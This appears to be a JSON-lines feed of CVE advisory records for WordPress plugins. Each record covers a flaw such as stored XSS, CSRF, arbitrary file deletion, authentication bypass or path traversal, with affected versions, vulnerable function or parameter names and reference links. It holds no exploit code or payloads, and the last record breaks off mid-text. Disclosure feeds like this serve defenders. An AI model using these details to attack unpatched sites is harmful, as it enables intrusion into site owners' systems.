{"CVE_ID":"CVE-2024-11224","slug":"parallax-image","versionImpact":"1.9","description":"The Parallax Image plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018position\u2019 parameter in all versions up to, and including, 1.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/56e5f7c9-ad22-43b3-9bfe-0eea1f8040d3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/56e5f7c9-ad22-43b3-9bfe-0eea1f8040d3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/parallax-image\\\/tags\\\/1.9\\\/assets\\\/shortcode.php#L156\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/parallax-image\\\/tags\\\/1.9\\\/assets\\\/shortcode.php#L156\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/parallax-image\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/parallax-image\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3189649\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3189649\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13753","slug":"ultimate-classified-listings","versionImpact":"1.4","description":"The Ultimate Classified Listings plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.4. This is due to missing or incorrect nonce validation on the update_profile function. This makes it possible for unauthenticated attackers to modify victim's email via a forged request, which might lead to account takeover, granted they can trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-classified-listings\\\/tags\\\/1.4\\\/classes\\\/class-shortcodes.php#L701\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-classified-listings\\\/tags\\\/1.4\\\/classes\\\/class-shortcodes.php#L701\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/61365b95-da97-425d-a314-648b3d00236f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/61365b95-da97-425d-a314-648b3d00236f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5686","slug":"paged-gallery","versionImpact":"0.7","description":"The Paged Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'gallery' shortcode in all versions up to, and including, 0.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paged-gallery\\\/trunk\\\/paged-gallery.php#L64\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paged-gallery\\\/trunk\\\/paged-gallery.php#L64\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc7dbdbe-fd0f-404b-9f9f-06e942f60a73?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc7dbdbe-fd0f-404b-9f9f-06e942f60a73?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6691","slug":"sureforms","versionImpact":"1.7.3","description":"The SureForms \u2013 Drag and Drop Form Builder for WordPress plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the delete_entry_files() function in all versions up to, and including, 1.7.3. This makes it possible for unauthenticated attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sureforms\\\/trunk\\\/admin\\\/views\\\/entries-list-table.php#L661\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sureforms\\\/trunk\\\/admin\\\/views\\\/entries-list-table.php#L661\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3319753%40sureforms&new=3319753%40sureforms&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3319753%40sureforms&new=3319753%40sureforms&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sureforms\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sureforms\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b4658546-bf57-414b-a3c9-bf7a5692c5fe?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b4658546-bf57-414b-a3c9-bf7a5692c5fe?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7965","slug":"cbx-restaurant-booking","versionImpact":"1.2.1","description":"The CBX Restaurant Booking WordPress plugin through 1.2.1 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/13e0db0b-87c5-4cf0-b0a6-178bdf96991b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/13e0db0b-87c5-4cf0-b0a6-178bdf96991b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2982","slug":"miniorange-login-openid","versionImpact":"7.6.4","description":"The WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn) plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 7.6.4. This is due to insufficient encryption on the user being supplied during a login validated through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they know the email address associated with that user. This was partially patched in version 7.6.4 and fully patched in version 7.6.5.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08ca186a-2486-4a58-9c53-03e9eba13e66?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08ca186a-2486-4a58-9c53-03e9eba13e66?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2925914\\\/miniorange-login-openid\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2925914\\\/miniorange-login-openid\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/miniorange-login-openid\\\/trunk\\\/mo-openid-social-login-functions.php#L107\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/miniorange-login-openid\\\/trunk\\\/mo-openid-social-login-functions.php#L107\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2924863\\\/miniorange-login-openid\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2924863\\\/miniorange-login-openid\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/lana.codes\\\/lanavdb\\\/2326f41f-a39f-4fde-8627-9d29fff91443\\\/\",\"name\":\"https:\\\/\\\/lana.codes\\\/lanavdb\\\/2326f41f-a39f-4fde-8627-9d29fff91443\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4040","slug":"payment-gateway-stripe-and-woocommerce-integration","versionImpact":"3.7.9","description":"The Stripe Payment Plugin for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the eh_callback_handler function in versions up to, and including, 3.7.9. This makes it possible for unauthenticated attackers to modify the order status of arbitrary WooCommerce orders.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2954934\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2954934\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ef543c61-2acc-4b72-81ff-883960d4c7c3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ef543c61-2acc-4b72-81ff-883960d4c7c3?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5767","slug":"sitetweet-tweets-user-behaviors-on-your-site-on-twitter","versionImpact":"0.2","description":"The sitetweet WordPress plugin through 0.2 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e4ba26b4-5f4f-4c9e-aa37-885b30ef8088\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e4ba26b4-5f4f-4c9e-aa37-885b30ef8088\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7032","slug":"clover-online-orders","versionImpact":"1.5.6","description":"The Smart Online Order for Clover plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'moo_deactivateAndClean' function in all versions up to, and including, 1.5.6. This makes it possible for unauthenticated attackers to deactivate the plugin and drop all plugin tables from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9a6b05b1-c649-4b72-b884-11fb83ec77f2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9a6b05b1-c649-4b72-b884-11fb83ec77f2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clover-online-orders\\\/trunk\\\/moo_OnlineOrders.php#L183\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clover-online-orders\\\/trunk\\\/moo_OnlineOrders.php#L183\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clover-online-orders\\\/trunk\\\/includes\\\/moo-OnlineOrders-deactivator.php#L29\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clover-online-orders\\\/trunk\\\/includes\\\/moo-OnlineOrders-deactivator.php#L29\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11198","slug":"gd-rating-system","versionImpact":"3.6.1","description":"The GD Rating System plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018extra_class\u2019 parameter in all versions up to, and including, 3.6.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/66cad18d-a433-47f1-9cb6-c619c8717a0d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/66cad18d-a433-47f1-9cb6-c619c8717a0d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gd-rating-system\\\/tags\\\/3.6.1\\\/d4plib\\\/plugin\\\/d4p.shortcodes.php#L63\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gd-rating-system\\\/tags\\\/3.6.1\\\/d4plib\\\/plugin\\\/d4p.shortcodes.php#L63\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gd-rating-system\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gd-rating-system\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3189622\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3189622\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-22503","slug":"dzs-enable-debug","versionImpact":"1.0.13","description":"Cross-Site Request Forgery (CSRF) vulnerability in Digital Zoom Studio Admin debug wordpress \u2013 enable debug allows Cross Site Request Forgery.This issue affects Admin debug wordpress \u2013 enable debug: from n\/a through 1.0.13.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/dzs-enable-debug\\\/vulnerability\\\/wordpress-admin-debug-wordpress-enable-debug-plugin-1-0-13-cross-site-request-forgery-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/dzs-enable-debug\\\/vulnerability\\\/wordpress-admin-debug-wordpress-enable-debug-plugin-1-0-13-cross-site-request-forgery-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0859","slug":"post-and-page-builder","versionImpact":"1.27.6","description":"The Post and Page Builder by BoldGrid \u2013 Visual Drag and Drop Editor plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.27.6 via the template_via_url() function. This makes it possible for authenticated attackers, with Contributor-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/BoldGrid\\\/post-and-page-builder\\\/pull\\\/638\\\/commits\\\/10e4d1d96fd2735379049259d15896fa6dd35471\",\"name\":\"https:\\\/\\\/github.com\\\/BoldGrid\\\/post-and-page-builder\\\/pull\\\/638\\\/commits\\\/10e4d1d96fd2735379049259d15896fa6dd35471\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-and-page-builder\\\/trunk\\\/includes\\\/class-boldgrid-editor-preview.php#L178\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-and-page-builder\\\/trunk\\\/includes\\\/class-boldgrid-editor-preview.php#L178\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old=3234175&old_path=post-and-page-builder%2Ftags%2F1.27.7%2Fincludes%2Fclass-boldgrid-editor-preview.php&new=3234175&new_path=post-and-page-builder%2Ftags%2F1.27.7%2Fincludes%2Fclass-boldgrid-editor-preview.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old=3234175&old_path=post-and-page-builder%2Ftags%2F1.27.7%2Fincludes%2Fclass-boldgrid-editor-preview.php&new=3234175&new_path=post-and-page-builder%2Ftags%2F1.27.7%2Fincludes%2Fclass-boldgrid-editor-preview.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/post-and-page-builder\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/post-and-page-builder\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/111a1e7f-bc87-4130-a0b2-422d0f98afb6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/111a1e7f-bc87-4130-a0b2-422d0f98afb6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5586","slug":"cpt-ajax-load-more","versionImpact":"1.6.0","description":"The WordPress Ajax Load More and Infinite Scroll plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018id\u2019 parameter in all versions up to, and including, 1.6.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cpt-ajax-load-more\\\/trunk\\\/includes\\\/class-cpt-alm-shortcodes.php#L126\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cpt-ajax-load-more\\\/trunk\\\/includes\\\/class-cpt-alm-shortcodes.php#L126\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cpt-ajax-load-more\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cpt-ajax-load-more\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5be80195-192a-4b53-9d10-4d877fa0afbe?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5be80195-192a-4b53-9d10-4d877fa0afbe?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4827","slug":"wp-tiles","versionImpact":"1.1.2","description":"The WP Tiles WordPress plugin through 1.1.2 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f2a922ac-6bc9-4caa-b1cc-9ca9cff4bd51\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f2a922ac-6bc9-4caa-b1cc-9ca9cff4bd51\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4383","slug":"wp-quick-front-end-editor","versionImpact":"5.5.","description":"The WP Quick FrontEnd Editor plugin for WordPress is vulnerable to page content injection in versions up to, and including, 5.5. This is due to missing capability checks in the plugin's page-editing functionality. This makes it possible for low-authenticated attackers, such as subscribers, to edit\/create any page or post on the blog.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f5492bff-cfd9-41ed-a59b-4445d5e83e86?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f5492bff-cfd9-41ed-a59b-4445d5e83e86?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-quick-front-end-editor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-quick-front-end-editor\\\/#developers\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-vulnerabilities-in-wordpress-wp-quick-frontend-editor-plugin-unpatched\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-vulnerabilities-in-wordpress-wp-quick-frontend-editor-plugin-unpatched\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1602","slug":"shorten-url","versionImpact":"1.6.4","description":"The Short URL plugin for WordPress is vulnerable to stored Cross-Site Scripting via the 'comment' parameter due to insufficient input sanitization and output escaping in versions up to, and including, 1.6.4. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2931815\\\/shorten-url\\\/trunk\\\/shorten-url.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2931815\\\/shorten-url\\\/trunk\\\/shorten-url.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/shorten-url\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/shorten-url\\\/#developers\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a5f29f35-da79-4389-a0a5-a1be0b0b8996?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a5f29f35-da79-4389-a0a5-a1be0b0b8996?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-31218","slug":"bulk-editor","description":"Cross-Site Request Forgery (CSRF) leading to Stored Cross-Site Scripting (XSS) vulnerability in realmag777 WOLF \u2013 WordPress Posts Bulk Editor and Manager Professional plugin <=\u00a01.0.6 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/bulk-editor\\\/wordpress-wolf-wordpress-posts-bulk-editor-and-manager-professional-plugin-1-0-6-cross-site-scripting-xss-via-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/bulk-editor\\\/wordpress-wolf-wordpress-posts-bulk-editor-and-manager-professional-plugin-1-0-6-cross-site-scripting-xss-via-csrf-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1095","slug":"control-block-patterns","versionImpact":"1.3.5.4","description":"The Build & Control Block Patterns \u2013 Boost up Gutenberg Editor plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the settings_export() function in all versions up to, and including, 1.3.5.4. This makes it possible for unauthenticated attackers to export the plugin's settings.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/38f09a45-2b11-47c7-af16-c7f9c3a46e0e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/38f09a45-2b11-47c7-af16-c7f9c3a46e0e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/control-block-patterns\\\/trunk\\\/classes\\\/Settings\\\/SettingsPage.php#L166\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/control-block-patterns\\\/trunk\\\/classes\\\/Settings\\\/SettingsPage.php#L166\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7030","slug":"clover-online-orders","versionImpact":"1.5.6","description":"The Smart Online Order for Clover plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several functions in all versions up to, and including, 1.5.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update product and category descriptions, category titles and images, and sort order.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8664fec3-4e11-4775-a5ca-b4f58931da76?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8664fec3-4e11-4775-a5ca-b4f58931da76?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clover-online-orders\\\/trunk\\\/admin\\\/js\\\/moo-OnlineOrders-admin.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clover-online-orders\\\/trunk\\\/admin\\\/js\\\/moo-OnlineOrders-admin.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clover-online-orders\\\/trunk\\\/public\\\/moo-OnlineOrders-public.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clover-online-orders\\\/trunk\\\/public\\\/moo-OnlineOrders-public.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9505","slug":"beaver-builder-lite-version","versionImpact":"2.8.4.2","description":"The Beaver Builder \u2013 WordPress Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Button widget in all versions up to, and including, 2.8.4.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7cfab048-efc6-4c7c-a1bd-0a9daf8779bc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7cfab048-efc6-4c7c-a1bd-0a9daf8779bc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/beaver-builder-lite-version\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/beaver-builder-lite-version\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3177345\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3177345\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wpbeaverbuilder.com\\\/change-logs\\\/\",\"name\":\"https:\\\/\\\/www.wpbeaverbuilder.com\\\/change-logs\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10056","slug":"contact-form-with-a-meeting-scheduler-by-vcita","versionImpact":"4.10.4","description":"The Contact Form Builder by vcita plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's livesite-pay shortcode in all versions up to, and including, 4.10.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3200766\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3200766\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/contact-form-with-a-meeting-scheduler-by-vcita\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/contact-form-with-a-meeting-scheduler-by-vcita\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5d1b419c-2276-415d-8c54-15da9125c442?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5d1b419c-2276-415d-8c54-15da9125c442?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13487","slug":"woo-multi-currency","versionImpact":"2.2.5","description":"The The CURCY \u2013 Multi Currency for WooCommerce \u2013 The best free currency exchange plugin \u2013 Run smoothly on WooCommerce 9.x plugin for WordPress is vulnerable to arbitrary shortcode execution via the get_products_price() function in all versions up to, and including, 2.2.5. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary 